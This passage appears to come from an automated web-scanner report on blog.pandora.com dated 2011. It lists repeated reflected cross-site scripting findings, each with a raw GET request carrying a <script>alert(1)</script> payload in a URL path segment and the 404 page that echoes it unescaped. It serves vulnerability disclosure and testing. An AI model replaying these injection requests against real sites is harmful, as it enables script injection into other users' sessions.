Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac8ae<script>alert(1)</script>07d5f78715a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f003<script>alert(1)</script>c2c8f4a2ec0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1b2a<script>alert(1)</script>283fea933c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ed28<script>alert(1)</script>2b8c9060753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43add<script>alert(1)</script>997001f8093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f01a6<script>alert(1)</script>b621b2a3f06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70767<script>alert(1)</script>cc798d55c4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d529c<script>alert(1)</script>b54dc99c7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d9cb<script>alert(1)</script>1d67bc84c6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 352 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31f0f<script>alert(1)</script>5b0b1194bdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora31f0f<script>alert(1)</script>5b0b1194bdd/archives/colorado/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b9f5<script>alert(1)</script>be7f68e6c8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives3b9f5<script>alert(1)</script>be7f68e6c8b/colorado/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5a5f<script>alert(1)</script>64acfed229b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>0d232e15ba4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc611<script>alert(1)</script>144240895da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2e2a<script>alert(1)</script>2320b502118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f19a8<script>alert(1)</script>5f361df41b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9bc1a<script>alert(1)</script>bc0dd599e1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b929c<script>alert(1)</script>ae5fbffaaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 937ab<script>alert(1)</script>11ad1856e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ was not found on this server.</p> ...[SNIP]...
